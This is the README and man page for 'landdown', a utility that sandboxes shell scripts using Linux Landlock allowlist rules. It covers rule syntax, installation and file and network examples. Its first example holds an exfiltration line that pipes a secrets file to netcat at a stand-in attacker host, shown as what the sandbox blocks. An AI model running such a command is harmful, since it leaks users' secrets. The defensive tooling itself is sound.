landdown

Simple Sandboxing for shell scripts.
README (2427B)
      1 landdown(1)		    General Commands Manual		   landdown(1)
      2 
      3 
      4 
      5 NAME
      6        Landdown - Simple shell script sandbox
      7 
      8 
      9 DESCRIPTION
     10        Landdown is an easy-to-use utility for Linux that allows you to sandbox
     11        shell scripts with Landlock. Just like Landlock, Landdown "aims to
     12        protect you against the security impacts of bugs or
     13        unexpected/malicious behavior". To use, prepend your script with the
     14        landdown shebang and a ruleset, and then write your shell script like
     15        you would normally. For example:
     16 
     17        #!/usr/bin/env landdown
     18        ro /bin
     19        ro /lib
     20        #!/bin/sh
     21        # Following works
     22        echo "Hi"
     23        # Following fails
     24        cat $HOME/my-secrets | nc exploit.com 1337
     25 
     26 
     27        Landdown locks down file and network access of a script based on rules
     28        explicitly listed in the allowlist.
     29 
     30 
     31 
     32 SUPPORTED RULES
     33        rof <file>
     34        rwf <file>
     35        ro <dir>
     36        rw <dir>
     37        bind <port>
     38        connect <port>
     39 
     40 
     41        Each rule can be used zero or more times.
     42 
     43 
     44        The syntax is
     45 
     46        #!/usr/bin/env landdown
     47        <rules...>
     48        #!<interpreter>
     49        <script content...>
     50 
     51 
     52 INSTALL
     53        go install git.sr.ht/~marcc/landdown@latest
     54 
     55 
     56        Arch Linux <https://aur.archlinux.org/packages/landdown-git>
     57 
     58 
     59 EXAMPLES
     60    Access a file
     61        Write the following script
     62 
     63        #!/usr/bin/env landdown
     64        ro /bin
     65        ro /lib
     66        rwf /tmp/some-file.txt
     67        #!/bin/sh
     68        echo "Edit" > /tmp/some-file.txt
     69 
     70 
     71        Try removing rwf /tmp/some-file.txt and the script should fail.
     72 
     73 
     74        Note: the file need to exist in order for landdown to work, run touch
     75        /tmp/some-file.txt to test.
     76 
     77 
     78    Network access
     79        Write the following script
     80 
     81        #!/usr/bin/env landdown
     82        ro /bin
     83        ro /lib
     84        ro /etc/ssl
     85        rof /etc/resolv.conf
     86        connect 443
     87        #!/bin/bash
     88        curl https://www.google.com
     89 
     90 
     91        Try removing ro /etc/ssl, rof /etc/resolv.conf, or connect 443 and it
     92        should fail. Network access needs to be explicitly set.
     93 
     94 
     95 CONTRIBUTIONS
     96        Contributions are welcome. Please send them to my public inbox
     97        <~marcc/public-inbox@lists.sr.ht>
     98 
     99 
    100 SEE ALSO
    101        sh(1) - section on ulimit
    102 
    103 
    104        Good Practices <https://docs.kernel.org/userspace-
    105        api/landlock.html#good-practices>
    106 
    107 
    108    Alternatives
    109        bubblewrap(1) firejail(1) landrun(1)
    110 
    111 				  2026-06-30			   landdown(1)